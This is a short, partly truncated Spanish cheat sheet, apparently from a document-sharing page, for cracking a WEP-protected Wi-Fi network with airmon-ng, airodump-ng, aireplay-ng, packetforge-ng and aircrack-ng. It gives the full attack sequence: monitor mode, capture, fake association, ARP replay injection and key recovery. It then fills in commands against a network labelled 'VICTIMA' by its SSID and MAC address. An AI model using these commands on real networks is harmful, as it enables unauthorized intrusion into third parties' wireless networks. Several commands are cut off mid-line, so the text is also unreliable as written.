You are on page 1of 1

++++ MODO MONITOR

++++ VER REDES DISPONIBLES


++++ AUDITORIA DE LA RED
id (mac ap) mon0
++++ 1 ASOCIACION CON LA RED
p) -h (mac nuestra) mon0
++++ 2 ASOCIACION CON LA RED
nuestra) mon0
++++ ENVIO PAQUETES
stra) mon0

sudo airmon-ng start wlan0


sudo airodump-ng mon0
sudo airodump-ng -c (canal) -w (ssid) --bss
sudo aireplay-ng -1 0 -e (ssid) -a (mac a
sudo aireplay-ng -1 0 -a (mac ap) -h (mac
sudo aireplay-ng -3 -b (mac ap) -h (mac nue

---- ESPERAR 80,000 paquetes para poder descriptar ---1 sudo aircrack-ng *.cap
2 sudo aircrack-ng -b (mac ap) (nombre cap).cap
------------------------------------------me::: ec:55:f9:22:8e:70
------------------------------------------VICTIMA
ssid::::::::::: vIeneTaxZ
mac ::::::::::: 00:24:56:10:9C:C9
------------------------------------------sudo airodump-ng -c 1 -w INFINITUM8A6E3E mon
sudo airodump-ng -c 6 -w vIeneTaxZ --bssid 00:24:56:10:9C:C9 mon0
sudo aireplay-ng -3 -b 00:24:17:01:FB:FD -h ec:55:f9:22:8e:70 mon0

shell: packetforge-ng -0 -a (mac del ap) -h 00:11:22:33:44:55 -l 255.255.255.255


-k 255.255.255.255 -y (nombre del pakete fragment) -w (nombre a escribir pakete
)
ec:55:f9:22:8e:70

You might also like